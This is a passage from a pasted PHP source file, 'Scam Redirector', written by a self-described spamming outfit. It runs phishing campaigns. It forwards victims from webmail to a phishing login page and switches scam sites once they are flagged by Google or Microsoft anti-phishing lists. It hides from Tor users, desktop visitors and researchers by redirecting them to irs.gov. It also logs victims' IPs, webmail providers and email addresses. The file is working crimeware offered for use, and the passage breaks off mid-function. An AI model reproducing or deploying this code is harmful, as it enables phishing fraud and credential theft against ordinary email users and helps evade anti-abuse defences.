· 7 years ago · Nov 28, 2018, 03:38 PM
1<?php
2/*************************************************************************************
3** Scam Redirector v0.1 with IP banning system and more... **
4** Last Modified: July 20, 2009 **
5** Made by: SSS (Smart Spamming Solutions) from Romania **
6** --- Getting Spam To A Higher Level --- **
7** **
8** Contact: ssslocalhost[at]gmail.com **
9** <$$$>If you make $$$ with my script, please donate a few to me also :-)</$$$> **
10** **
11** Features: **
12** - Auto-change scam website if is offline or in Google's phish database **
13** - Advanced IP & Word (UA & Referrer) banning system, including Tor network **
14** - Logging system with anti-log poisoning through UA or Referrer **
15** - Sends an email when you are running out of scams **
16*************************************************************************************/
17//http://www.botsvsbrowsers.com/ip/166.137.133.178/index.html
18//https://wiki.mozilla.org/Phishing_Protection:_Server_Spec#Lookup_Requests
19//Do not show PHP errors
20error_reporting(0); //Leave as-is (recommended), otherwise put // in front of error_reporting(0);
21
22/*************
23** Settings **
24**************/
25//Scam Redirector version
26define("VERSION", "v0.1-July 20, 2009");
27
28//Log file, where the visitor data should be written
29define("LOG_FILE", "ip.html");
30
31//------------ TESTING or PRODUCTION
32define('STAGE', 'PRODUCTION');
33
34//Add Google Analytics, for advanced Spam Statistics :-)
35$google_analytics = 0; // 1 - True; 0 - False
36
37//Use the IP banning system
38$ip_ban = 1; // 1 - True; 0 - False
39
40//Ban Tor network IPs
41$ban_tor = 1; // 1 - True; 0 - False
42
43//Use the word banning system
44$word_ban = 1; // 1 - True; 0 - False
45
46$desktop_ban = 1;
47
48//Send email, if you are running out of scams
49$send_email = 1; // 1 - True; 0 - False
50
51//Where to send an email, if you are running out of scams ($send_email must be set to 1)
52define("EMAIL", "mainiuaidi@yahoo.com"); //Change this with your own email
53
54//Where to redirect the banned visitor
55define("REDIRECT_TO", "https://irs.gov"); //Leave as-is (recommended)
56
57//Check the scam against Google's antiphish database (used in Firefox)
58//For better spam results set it to 1, but is not recommended since you will run out of scams in a matter of hours!
59define("GOOG_ANTIPHISH", 1); // 1 - True; 0 - False
60
61//Check the scam against Microsoft's antiphish database (used in Internet Explorer)
62//For better spam results set it to 1, but is not recommended since you will run out of scams in a matter of hours!
63$msft_antiphish = 1; // 1 - True; 0 - False
64
65
66 if (STAGE == 'TESTING')
67 {
68 //Define the path of the scam
69 define("PATH", "");
70
71 //Define scam pages
72 $scams = array('http://127.0.0.1/redirect/isonline.php', 'http://127.0.0.1/redirect/isonline2.php',
73 'http://127.0.0.1/redirect/isonline3.php', 'http://127.0.0.1/redirect/isonline4.php',
74 'http://127.0.0.1/redirect/isonline5.php');
75 } elseif (STAGE == 'PRODUCTION')
76 {
77 //Define the path of the scam
78 define("PATH", "login-rp.html");
79
80 //Define scam pages
81 $scams = array('http://wumt.western.natura-medica.net/');
82 }
83
84define("FRH_TOTAL", count($scams));
85define("FRH_ONLINE", "Coming Soon");
86define("FRH_OFFLINE", "Coming Soon");
87
88$file = $_SERVER['PHP_SELF'];
89define("INDEX", $file);
90
91define("EMAILSFILE", "emails.txt");
92
93if ($_GET && !isset($_GET['tus']))
94{
95 SSSCommands();
96}
97
98InitStats();
99
100$detect_os = strtoupper($_SERVER["SERVER_SOFTWARE"]);
101$pos = strpos($detect_os, "WIN32");
102if ($pos === false) {
103 $current_os = "NON_WINDOWS";
104} else {
105 $current_os = "WINDOWS";
106}
107
108
109
110//Get the visitor IP
111if (@getenv(HTTP_CLIENT_IP))
112{
113 $ip = @getenv(HTTP_CLIENT_IP);
114} else
115{
116 $ip = @getenv(REMOTE_ADDR);
117}
118
119//Get hostname by IP
120$hostname = gethostbyaddr($ip);
121
122//Get date & time of the visit
123$dt = date("Y-m-d h:i:s A");
124
125//Get visitor's User Agent
126$agent = htmlspecialchars($_SERVER['HTTP_USER_AGENT']);
127
128
129
130
131
132
133//Get visitor's referrer
134if (isset($_SERVER['HTTP_REFERER']))
135{
136 $referrer = strtolower(htmlspecialchars($_SERVER['HTTP_REFERER']));
137} else
138 $referrer = "";
139
140
141function NumberFromUri(){
142 if(isset($_GET['tus'])){
143 $sdsdsd = strtolower(htmlspecialchars($_GET['tus']));
144 }else{
145 $sdsdsd = "Unknown destination";
146 }
147
148 return $sdsdsd;
149}
150
151//Function to get the webmail name
152function MailFromReferrer($referrer)
153{
154 //Define the patterns
155 $wp = array('mail.yahoo.', 'mail.live.com', 'webmail.aol.com', 'mail.aol.com',
156 '.earthlink.net', 'mail.lycos.com', 'mail.google.com', 'mail.excite.it',
157 '.libero.it', '.alice.it', 'mail.comcast.net', 'webmail.att.net', 'mail.rcn.',
158 '.mail.com', 'webmail.canada.com', '.verizon.net', 'commcenter.mchsi.com',
159 '.juno.com', 'newmail.core.com', 'webmail.peoplepc.com', '.netaddress.com',
160 '.bigpond.com', '.orange.co.uk', '.rr.com', '.roadrunner.com', 'www.me.com',
161 '.netzero.net', 'tiscali.co.uk', '.maktoob.com', '.netscape.com', '.rock.com',
162 '.operamail.com', 'www.google.com/ig/gmailmax', '.secureserver.net', '.coxmail.com', '.cox.net',
163 '.fuse.net', '.inbox.com', '.ntlworld.com', '.alltel.net', '.email.it',
164 '.nhlmail.com', '.alloymail.com', '.tiscali.it', '.dada.it', '.graffiti.net',
165 '.handbag.com', '.freenet.de', '.bluewin.ch', '.arcor.de', '.strato.de',
166 '.unitybox.de', '.eim.ae', 'mynet.com', 'oi.com.br', '.abv.bg', '.1und1.de', '.perfora.net',
167 '.abacho.de', '.yandex.ru', '.networld.at', '.rediffmail.com', '.mail.ru', 'mail.bg', '.edumail.at', '.verizonmail.com',
168 '.guam.net', '.northnet.org', '.easilymail.co.uk', '.knology.net', '.startlogic.com', '.katamail.com', '.tele2internet.it',
169 '.interfree.it', '.tim.it', '.jumpy.it', '.gmxattachments.net', '.fastwebnet.it', '.ilink.ro', '.zappmobile.ro', '.connex.ro',
170 '.freemail.hu', '.rediffmailpro.com', '.mayl.de', '.tre.it', '.cheapnet.it', '.ipower.com', '.aruba.it', '.gmx.net', '.tele2.it',
171 '.register.it', '.univision.com', '.charter.net', '.doteasy.com', '.utanet.at', '.alicebusiness.it', '.walla.co.il', '.fastmail.fm',
172 '.unofree.it', '.simail.it', '.netcentrum.cz', 'webmail.frontier.com');
173
174 //Define de webmail name
175 $wm = array('Yahoo! Mail', 'Hotmail', 'AOL', 'AOL', 'Earthlink', 'Lycos', 'Gmail',
176 'Excite IT', 'Libero IT', 'Alice IT', 'Comcast', 'AT&T', 'RCN', 'Mail', 'Canada',
177 'Verizon', 'Mediacom', 'Juno', 'CoreComm', 'PeoplePC', 'Net@ddress',
178 'BigPond', 'Orange', 'Road Runner', 'Road Runner', 'MobileMe', 'NetZero', 'Tiscali UK',
179 'Maktoob', 'Netscape', 'Rock.com', 'OperaMail', 'Gmail', 'secureserver.net', 'Cox', 'Cox',
180 'Fuse', 'Inbox.com', 'Virgin Media', 'Windstream', 'Email.it', 'Mail', 'Mail', 'Tiscali IT',
181 'Data.it', 'Graffiti.net', 'Handbag.com', 'freenet.de', 'bluewin.ch', 'Arcor', 'Strato.de',
182 'Unitymedia Mail', 'Etisalat', 'MYNET', 'Oi Brasil', 'Abv.bg', '1&1 Webmail', '1&1 Webmail',
183 'Abacho.de', 'Yandex', 'Networld Mail', 'Rediffmail', 'Mail.ru', 'Mail.bg', 'edumail.at', 'Verizon', 'Guam.net',
184 'Westelcom', 'EasilyMail', 'Knology', 'StartLogic', 'Katamail', 'TELE2 IT', 'Interfree', 'TIM', 'Mediaset.it',
185 'GMX', 'FASTWEB', 'iLink', 'Zapp Mobile', 'Connex', 'freemail.hu', 'Rediffmail Pro', 'MAYL.DE', 'Tre', 'Cheapnet',
186 'WEB.DE', 'IPOWER Webmail', 'Aruba Webmail', 'GMX', 'TELE2 IT', 'Register.it Webmail', 'Univision.com',
187 'Charter.net', 'Doteasy Webmail', 'TELE2 AT', 'Alice', 'Walla.co.il', 'FastMail', 'Uno Communications SpA', 'Simail.it', 'NetCentrum', 'Frontier');
188
189 //Define type
190 $wt = array('inbox', 'bulk', 'spam', 'junk', 'trash');
191
192 if (!empty($referrer))
193 {
194 for ($i = 0; $i <= count($wp) - 1; $i++)
195 {
196 $pos = strpos($referrer, $wp[$i]);
197 if ($pos === false)
198 {
199 //
200 } else
201 {
202 $pos1 = strpos($referrer, 'inbox');
203 if ($pos1 === false)
204 {
205
206 $pos2 = strpos($referrer, 'bulk');
207 if ($pos2 === false)
208 {
209 //
210
211 $pos3 = strpos($referrer, 'spam');
212 if ($pos3 === false)
213 {
214 $referrer = $wm[$i];
215 } else
216 {
217 $referrer = $wm[$i] . " - SPAM";
218 }
219
220 } else
221 {
222 $referrer = $wm[$i] . " - BULK";
223 }
224
225
226 } else
227 {
228 $referrer = $wm[$i] . " - INBOX";
229 }
230 }
231
232
233 }
234 }
235 return $referrer;
236}
237
238//Function to check if the IP is in our mask
239function compareRange($ip, $mask, $remaining)
240{
241 $ip = explode('.', $ip);
242 $mask = explode('.', $mask);
243 for ($i = 0; $i < sizeof($ip); $i++)
244 {
245 $m = $i < sizeof($mask) ? $mask[$i] : $remaining;
246 if ($ip[$i] < $m)
247 return - 1;
248 if ($ip[$i] > $m)
249 return 1;
250 }
251 return 0;
252}
253
254//Function to check if the IP is banned
255function checkIP($ip_to_match, $ip_array)
256{
257 if (is_array($ip_array))
258 {
259 foreach ($ip_array as $filter)
260 {
261 if (strpos($filter, '-') === false)
262 $limits = array($filter, $filter);
263 else
264 $limits = explode('-', $filter);
265 if (compareRange($ip_to_match, $limits[0], 0) >= 0 && compareRange($ip_to_match,
266 $limits[1], 255) <= 0)
267 return true;
268 }
269 }
270 return false;
271}
272
273//Function to check if the IP is banned
274function GetIPOwner($ip_to_match, $ip_array, $owner_array)
275{
276 if (is_array($ip_array))
277 {
278 $i = -1;
279 foreach ($ip_array as $filter)
280 {
281 $i++;
282 if (strpos($filter, '-') === false)
283 $limits = array($filter, $filter);
284 else
285 $limits = explode('-', $filter);
286 if (compareRange($ip_to_match, $limits[0], 0) >= 0 && compareRange($ip_to_match,
287 $limits[1], 255) <= 0){
288 if ($owner_array[$i] == '') return 'Not found'; else
289 return $owner_array[$i];
290 }
291 }
292 }
293 return 'Not found';
294}
295
296function counter()
297{
298 if (!file_exists('counter.txt'))
299 {
300 $fh = fopen('counter.txt', 'a');
301 fwrite($fh, "0\n");
302 fclose($fh);
303 }
304 $fh = fopen('counter.txt', 'r+');
305 $data = fread($fh, 512);
306 $count = $data + 1;
307 fseek($fh, 0);
308 fwrite($fh, $count . "\n");
309 fclose($fh);
310 return $count;
311}
312
313/**
314* Function get_between
315*
316* @param str IP Address
317* @return Boolean value representing whether or not the visitor should been banned
318*/
319function get_between($text, $s1, $s2) {
320 $mid_url = "";
321 $pos_s = strpos($text,$s1);
322 $pos_e = strpos($text,$s2);
323 for ( $i=$pos_s+strlen($s1) ; ( ( $i < ($pos_e)) && $i < strlen($text) ) ; $i++ ) {
324 $mid_url .= $text[$i];
325 }
326 return $mid_url;
327}
328
329/**
330* Function checkOnTheFlyBan check if the IP Address is in our On The Fly list with banned IPs
331*
332* @param str IP Address
333* @return Boolean value representing whether or not the visitor should been banned
334*/
335function checkOnTheFlyBan($ip)
336{
337 $url = "ip_ban.txt";
338 $lines = array_map('rtrim',file($url));
339 foreach ($lines as $line_num => $line)
340 {
341 if ($ip == $line)
342 {
343 return true;
344 }
345 }
346 return false;
347}
348
349function checkMobile(){
350 $useragent=$_SERVER['HTTP_USER_AGENT'];
351 if(preg_match('/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows (ce|phone)|xda|xiino/i',$useragent)||preg_match('/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i',substr($useragent,0,4))){
352 $mobile = true;
353 }else {
354 $mobile = false;
355 }
356 return $mobile;
357}
358
359//Function to check if the IP is a Tor node
360function checkTorNode($ip)
361{
362 //Tor nodes from https://www.dan.me.uk/torlist/
363 $url = "tor.txt"; // https://www.dan.me.uk/torlist/
364 $lines = array_map('rtrim',file($url));
365 foreach ($lines as $line_num => $line)
366 {
367 if ($ip == $line)
368 {
369 return true;
370 }
371 }
372 return false;
373}
374
375//Function to check if the word from referrer or UA is banned
376function checkWord($str, $bw)
377{
378 if (!empty($str))
379 {
380 $str = strtolower($str);
381 for ($i = 0; $i <= count($bw) - 1; $i++)
382 {
383 $pos = strpos($str, $bw[$i]);
384 if ($pos === false)
385 {
386 $bool = false;
387 } else
388 {
389 $bool = true;
390 break;
391 }
392 }
393 } else
394 {
395 $bool = false;
396 }
397 return $bool;
398}
399
400/**
401* Function SSSCommands is used to display internal pages of Scam Redirector
402*/
403function SSSCommands()
404{
405 define("TITLE", "[x0w] [R]edirector");
406 /**
407 * Function ShowMenu is used to display Scam Redirector's menu
408 */
409 function ShowMenu()
410 {
411 echo '<center>';
412 echo '<br /><br />[ <a href="'.LOG_FILE.'" target="_blank">View IP Log</a> ] | [ <a href="ip_ban.txt" target="_blank">View On-The-Fly IP List</a> ] | [ <a href="'.EMAILSFILE.'" target="_blank">View On-The-Fly Email List</a> ]';
413 echo "<br />[ <a href=".INDEX."?about>About</a> ] | [ <a href=".INDEX."?check>Check</a> ] | [ <a href=".INDEX."?empty>Empty</a> ] | [ <a href=".INDEX."?help>Help</a> ] | [ <a href=".INDEX."?info target=_blank>Info</a> ] | [ <a href=".INDEX."?settings>Settings</a> ] | [ <a href=".INDEX."?stats>Statistics</a> ] | [ <a href=".INDEX."?ver>Version</a> ] | [ <a href=".INDEX."?verify>Verify</a> ]";
414 echo '<br /><br />Copyright (c) 2014, <b>[S]</b>mart <b>[S]</b>pamming <b>[S]</b>olutions. All Rights Reserved.';
415 echo '</center>';
416 }
417
418 /**
419 * Function Percent is used to calculate the percentage based on two inputs
420 */
421 function Percent($num, $total, $p = false){
422 $per = round($num / $total * 100, 2);
423 if($p == true){
424 $per .= "%";
425 }
426 return $per;
427 }
428
429if (isset($_GET['about']))
430{
431 echo '<html><head><title>'.TITLE.' - About</title></head><body><center>';
432 echo "About <b>[S]</b>cam <b>[R]</b>edirector";
433 echo "<br /><br />";
434 echo "Version ".VERSION;
435 echo "<br /><br />";
436 echo "Made in Romania";
437 echo "<br /><br />";
438 echo "--- Getting Spam To A Higher Level ---";
439 echo "<br /><br />";
440 echo '</center>';
441 ShowMenu();
442 echo '</body></html>';
443}
444
445if (isset($_GET['check']))
446{
447 echo '<html><head><title>'.TITLE.' - Check</title></head><body><center>';
448
449$func = array("mail", "file_get_contents");
450
451for ($i=0;$i<count($func);$i++) {
452 if(!function_exists($func[$i])) {
453 echo "<font color=red>$func[$i] is not available. You cannot install <b>Scam Redirector</b> on this server.</font><br/>";
454 } else {
455 echo "<font color=green>$func[$i] is available. You can install <b>Scam Redirector</b> on this server.</font><br/>";
456 }
457}
458 echo '</center>';
459 ShowMenu();
460 echo '</body></html>';
461}
462
463//Piece of code used to clean-up the log file (Usage: index.php?empty)
464if (isset($_GET['empty']))
465{
466 echo '<html><head><title>'.TITLE.' - Empty</title></head><body><center>';
467 echo '<a href="'.INDEX.'?empty1">Clean '.LOG_FILE.'</a><br /><a href="'.INDEX.'?empty2">Clean '.LOG_FILE.' & reset counter & statistics</a>';
468 echo '</center>';
469 ShowMenu();
470 echo '</body></html>';
471}
472
473//Piece of code used to clean-up the log file (Usage: index.php?empty)
474if (isset($_GET['empty1']))
475{
476 //Reset counter
477 $fh = fopen(LOG_FILE, "w");
478 fwrite($fh, "");
479 fclose($fh);
480
481 echo '<html><head><title>'.TITLE.' - Empty</title></head><body><center>';
482 echo "The log file <b>".LOG_FILE."</b> has been cleaned.";
483 echo '</center>';
484 ShowMenu();
485 echo '</body></html>';
486}
487
488//Piece of code used to clean-up the log file (Usage: index.php?empty)
489if (isset($_GET['empty2']))
490{
491 //Reset counter
492 $fh = fopen(LOG_FILE, "w");
493 fwrite($fh, "");
494 fclose($fh);
495
496 echo '<html><head><title>'.TITLE.' - Empty</title></head><body><center>';
497 echo "The log file <b>".LOG_FILE."</b> has been cleaned.";
498
499 $fh = fopen('counter.txt', 'w');
500 fwrite($fh, "0\n");
501 fclose($fh);
502 $fh = fopen('stats.txt', 'w');
503 fwrite($fh, time().",0,0,0,0,0");
504 fclose($fh);
505 echo " The counter & statistics have been reset!";
506 echo '</center>';
507 ShowMenu();
508 echo '</body></html>';
509}
510
511if (isset($_GET['help']))
512{
513 echo '<html><head><title>'.TITLE.' - Help</title></head><body>';
514 echo "<b>[S]</b>cam <b>[R]</b>edirector Help";
515 echo "<br /><br />";
516 echo "<b>about</b> - Provides information about <b>[S]</b>cam <b>[R]</b>edirector";
517 echo "<br /><br />";
518 echo "<b>check</b> - Check if you can run <b>[S]</b>cam <b>[R]</b>edirector on this host.";
519 echo "<br /><br />";
520 echo "<b>empty</b> - Clears the log file.";
521 echo "<br /><br />";
522 echo "<b>help</b> - Provides Help information for <b>[S]</b>cam <b>[R]</b>edirector commands.";
523 echo "<br /><br />";
524 echo "<b>info</b> - Executes the phpinfo().";
525 echo "<br /><br />";
526 echo "<b>menu</b> - Displays the <b>[S]</b>cam <b>[R]</b>edirector menu.";
527 echo "<br /><br />";
528 echo "<b>stats</b> - Displays statistics about your spam and <b>[S]</b>cam <b>[R]</b>edirector.";
529 echo "<br /><br />";
530 echo "<b>ver</b> - Displays the <b>[S]</b>cam <b>[R]</b>edirector version.";
531 echo "<br /><br />";
532 echo "<b>verify</b> - Verify each scam and reports its status.";
533 echo "<br /><br />";
534 echo "Usage: <b>index.php?help</b>";
535 ShowMenu();
536 echo '</body></html>';
537}
538
539if (isset($_GET['info']))
540{
541 echo '<html><head><title>'.TITLE.' - Info (phpinfo)</title></head><body></body></html>';
542 phpinfo();
543}
544
545if (isset($_GET['menu']))
546{
547 echo '<html><head><title>'.TITLE.' - Menu</title></head><body>';
548 ShowMenu();
549 echo '</body></html>';
550}
551
552if (isset($_GET['settings']))
553{
554 echo '<html><head><title>'.TITLE.' - Settings</title></head><body>';
555 echo "<b>[S]</b>cam <b>[R]</b>edirector Settings";
556 echo "<br /><br />";
557 echo '<fieldset><legend>Settings</legend><table width="500" border="0">
558 <tr>
559 <td width="140"><b>Google Analytics</b></td>
560 <td width="10"> </td>
561 <td width="253">
562 <select name="ga">
563 <option value="Yes">Yes</option>
564 <option value="No" selected>No</option>
565 </select>
566 </td>
567 </tr>
568 <tr>
569 <td><b>Send Email</b></td>
570 <td> </td>
571 <td><select name="send_email">
572 <option value="Yes" selected>Yes</option>
573 <option value="No">No</option>
574 </select></td>
575 </tr>
576 <tr>
577 <td><b>Email</b></td>
578 <td> </td>
579 <td><input type="text" name="email" size="30" value="'.EMAIL.'" /></td>
580 </tr>
581 <tr>
582 <td><b>Redirect to</b></td>
583 <td> </td>
584 <td><input type="text" name="redirect_to" size="30" value="'.REDIRECT_TO.'" /></td>
585 </tr>
586 <tr>
587 <td><b>Stage</b></td>
588 <td> </td>
589 <td>
590 <select name="stage">';
591 if (STAGE == 'TESTING'){
592 echo '<option value="TESTING" selected>TESTING</option><option value="PRODUCTION">PRODUCTION</option>';
593 } elseif (STAGE == 'PRODUCTION'){
594 echo '<option value="TESTING">TESTING</option><option value="PRODUCTION" selected>PRODUCTION</option>';
595 }
596 echo '</select>
597 </td>
598 </tr>
599 <tr>
600 <td> </td>
601 <td> </td>
602 <td><input type="submit" name="submit" value="Save" /></td>
603 </tr>
604</table></fieldset>';
605 echo '<fieldset><legend>Logging</legend><table width="500" border="0">
606 <tr>
607 <td width="140"><b>Log File</b></td>
608 <td width="10"> </td>
609 <td width="253"><input type="text" name="log_file" value="'.LOG_FILE.'" /></td>
610 </tr>
611 <tr>
612 <td><b>Log normal IPs</b></td>
613 <td> </td>
614 <td><select name="log1">
615 <option value="Yes" selected>Yes</option>
616 <option value="No">No</option>
617 </select></td>
618 </tr>
619 <tr>
620 <td><b>Log banned IPs</b></td>
621 <td> </td>
622 <td><select name="log2">
623 <option value="Yes" selected>Yes</option>
624 <option value="No">No</option>
625 </select></td>
626 </tr>
627 <tr>
628 <td><b>Log watched IPs</b></td>
629 <td> </td>
630 <td><select name="log3">
631 <option value="Yes" selected>Yes</option>
632 <option value="No">No</option>
633 </select></td>
634 </tr>
635</table></fieldset>';
636 echo '<fieldset><legend>Banning</legend><table width="500" border="0">
637 <tr>
638 <td width="140"><b>IP Banning</b></td>
639 <td width="10"> </td>
640 <td width="253">
641 <select name="ban1">
642 <option value="Yes" selected>Yes</option>
643 <option value="No">No</option>
644 </select>
645 </td>
646 </tr>
647 <tr>
648 <td><b>Ban Tor Network</b></td>
649 <td> </td>
650 <td><select name="ban2">
651 <option value="Yes" selected>Yes</option>
652 <option value="No">No</option>
653 </select></td>
654 </tr>
655 <tr>
656 <td><b>Word Banning</b></td>
657 <td> </td>
658 <td><select name="ban2">
659 <option value="Yes" selected>Yes</option>
660 <option value="No">No</option>
661 </select></td>
662 </tr>
663</table></fieldset>';
664 echo '<fieldset><legend>Scams</legend><table width="500" border="0">
665 <tr>
666 <td width="140"><b>ScamPrint™</b></td>
667 <td width="10"> </td>
668 <td width="253"><input type="text" name="sp_1" size="40" value="<ISONLINE VALUE=TRUE></ISONLINE>" /></td>
669 </tr>
670 <tr>
671 <td><b>Google Antiphish</b></td>
672 <td> </td>
673 <td><select name="goog">
674 <option value="Yes" selected>Yes</option>
675 <option value="No">No</option>
676 </select></td>
677 </tr>
678 <tr>
679 <td><b>Microsoft Antiphish</b></td>
680 <td> </td>
681 <td><select name="msft">
682 <option value="Yes" selected>Yes</option>
683 <option value="No">No</option>
684 </select></td>
685 </tr>
686</table></fieldset>';
687 ShowMenu();
688 echo '</body></html>';
689}
690
691if (isset($_GET['stats']))
692{
693 $fh = fopen('stats.txt', 'r');
694 $data = fread($fh, 1024);
695 $array = explode(",", $data);
696 fclose($fh);
697
698 $otfip = 0;
699 $otfemails = 0;
700
701 if (file_exists('ip_ban.txt'))
702 {
703 $otfip = count(file('ip_ban.txt'));
704 }
705 if (file_exists(EMAILSFILE))
706 {
707 $otfemails = count(file(EMAILSFILE));
708 }
709
710 $vst = $array[1];
711 $unq = $array[2];
712 $bnd = $array[3];
713 $per1 = Percent($bnd, $vst, true);
714 $wat = $array[4];
715 if ($wat == '')
716 {
717 $wat = 0;
718 }
719 $per2 = Percent($wat, $vst, true);
720 $nor = $array[5];
721 $per3 = Percent($nor, $vst, true);
722 global $scams;
723 $FRH_CURRENT = ScamURL($scams);
724
725 $FRH_CURRENT_PARTS = parse_url($FRH_CURRENT);
726 $FRH_URL = $FRH_CURRENT_PARTS['scheme']."://".$FRH_CURRENT_PARTS['host'];
727 $frh_html = "";
728 for ($i = 0; $i <= count($scams) - 1; $i++)
729 {
730 $frh_html .= "#{".($i+1)."} $scams[$i]<br />";
731 }
732 $frh_html = str_replace($FRH_URL, "<font color=red>$FRH_URL</font>", $frh_html);
733 /*
734 $key = array_search($FRH_CURRENT, $scams);
735 $frh_online = FRH_TOTAL - $key;
736 */
737 echo '<html><head><title>'.TITLE.' - Statistics</title><meta http-equiv="refresh" content="10" /></head><body>';
738 echo "<b>[S]</b>cam <b>[R]</b>edirector Statistics";
739 echo "<br /><br />";
740 echo "Uptime: ".readable_time($array[0], 7);
741 echo "<br /><br />";
742 echo "Freehostia's: ".FRH_TOTAL."<br />".$frh_html."<br />Online: ".FRH_ONLINE."<br />Offline: ".FRH_OFFLINE;
743 echo "<br /><br />";
744 echo 'Visitors: <b><a href="'.LOG_FILE.'" target="_blank">'.$vst.'</a></b><br />Unique: <b>'.$unq.'</b><br />Banned: <b>'.$bnd.' ('.$per1.')</b><br />Watched: <b>'.$wat.' ('.$per2.')</b><br />Normal: <b>'.$nor.' ('.$per3.')</b>';
745 echo "<br /><br />";
746 echo 'On-The-Fly IPs: <b><a href="ip_ban.txt" target="_blank">'.$otfip.'</a></b><br />Emails: <b><a href="'.EMAILSFILE.'" target="_blank">'.$otfemails.'</a></b>';
747 echo "<br /><br />";
748 echo "Listed on Phishtank: <b>".GetPhishtank()."</b><br />Listed on Microsoft's phishing database: <b>No</b><br />Listed on Google's phishing database: <b>No</b>";
749 ShowMenu();
750 echo '</body></html>';
751}
752
753if (isset($_GET['ver']))
754{
755 echo '<html><head><title>'.TITLE.' - Version</title></head><body><center>';
756 echo "You are running <b>[S]</b>cam <b>[R]</b>edirector ".VERSION.".";
757 echo '</center>';
758 ShowMenu();
759 echo '</body></html>';
760}
761
762if (isset($_GET['verify']))
763{
764 echo '<html><head><title>'.TITLE.' - Verify</title></head><body><center>';
765 echo "Coming Soon";
766 echo '</center>';
767 ShowMenu();
768 echo '</body></html>';
769}
770
771die();
772}
773
774/**
775* Function checkAsRedirect check if the referrer is the same with Scam Redirector URL. If true, 90% of the vistors should be banned
776*
777* @param referrer Visitor's referrer
778* @return Boolean value representing whether or not the visitor should been banned
779*/
780function checkAsRedirect($referrer)
781{
782 //Check if server uses http or https
783 $protocol = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') ? 'https' : 'http';
784
785 /*
786 $_SERVER['SERVER_NAME'] does not work if UseCanonicalName is off. Used $_SERVER['HTTP_HOST'] instead
787 */
788 $url_1 = $protocol."://".$_SERVER['HTTP_HOST'].substr(INDEX, 0, strrpos(INDEX, '/'));
789 $url_2 = $protocol."://".$_SERVER['HTTP_HOST'].substr(INDEX, 0, strrpos(INDEX, '/'))."/";
790 if (($referrer == $url_1) || ($referrer == $url_2))
791 {
792 return true;
793 }
794 return false;
795}
796
797/**
798* Function RedirectURL check if the referrer is the same with Scam Redirector URL. If true, 90% of the vistors should be banned
799*
800* @param referrer Visitor's referrer
801* @return Boolean value representing whether or not the visitor should been banned
802*/
803function RedirectURL()
804{
805 //Check if server uses http or https
806 $protocol = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') ? 'https' : 'http';
807 $url = $protocol."://".$_SERVER['HTTP_HOST'].substr(INDEX, 0, strrpos(INDEX, '/'));
808 return $url;
809}
810
811/**
812* Function checkMatch check if the string matches our banned string
813*
814* @param str string
815* @param array Array with banned strings
816* @return Boolean value representing whether or not the visitor should been banned
817*/
818function checkMatch($str, $array)
819{
820 for ($i = 0; $i <= count($array) - 1; $i++)
821 {
822 if ($str == $array[$i])
823 {
824 return true;
825 break;
826 }
827 }
828 return false;
829}
830
831/**
832* Function checkUniqueIP
833*
834* @param ip IP Address
835*/
836function checkUniqueIP($ip)
837{
838 $lines = array_map('rtrim',file('ip.txt'));
839 foreach ($lines as $line_num => $line)
840 {
841 if ($ip == $line)
842 {
843 return true;
844 }
845 }
846 return false;
847}
848
849/**
850* Function CheckDuplicate verifies the specified file for duplicate strings
851*
852* @param str The string we want to check
853* @param file The file where we will check for duplicate
854* @return Boolean value representing whether or not the visitor should been banned
855*/
856function CheckDuplicate($str, $file) {
857 if (file_exists($file))
858 {
